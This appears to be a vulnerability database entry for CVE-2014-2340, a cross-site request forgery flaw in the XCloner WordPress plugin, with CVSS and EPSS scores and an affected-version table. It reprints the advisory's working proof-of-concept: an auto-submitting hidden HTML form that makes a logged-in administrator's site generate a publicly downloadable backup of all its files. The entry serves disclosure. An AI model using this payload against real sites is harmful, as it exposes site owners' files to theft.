6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.014 Low
EPSS
Percentile
85.1%
High-Tech Bridge Security Research Lab discovered vulnerability in XCloner Wordpress plugin, which can be exploited to perform a CSRF attack and gain access to a backed-up copy of vulnerable website.
Сross-Site Request Forgery (CSRF) in XCloner Wordpress Plugin: CVE-2014-2340
The vulnerability exists due to insufficient verification of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage and create a website backup.
Simple exploit code below will create new backup with all website files (no SQL database), which will be publicly accessible on the http://[host]/administrator/backups/backup.tar URL:
<form action=“http://[host]/wp-admin/plugins.php?page=xcloner_show&option=com_clon er&task=confirm” method=“post” name=“main”>
<input type=“hidden” name=“dbbackup” value=“1”>
<input type=“hidden” name=“dbbackup_comp” value=“”>
<input type=“hidden” name=“bname” value=“backup”>
<input type=“hidden” name=“backupComments” value=“”>
<input type=“hidden” name=“option” value=“com_cloner”>
<input type=“hidden” name=“task” value=“generate”>
<input type=“hidden” name=“boxchecked” value=“0”>
<input type=“hidden” name=“hidemainmenu” value=“0”>
<input type=“hidden” name=“” value=“”>
<input type=“submit” name=“run” value=“run”>
</form>
<script>
document.main.submit();
</script>
CPE | Name | Operator | Version |
---|---|---|---|
xcloner wordpress plugin | le | 3.1.0 |